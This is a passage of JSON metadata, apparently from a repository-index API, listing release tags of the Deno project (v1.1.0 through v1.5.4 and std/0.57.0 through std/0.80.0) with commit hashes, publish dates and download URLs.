d1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_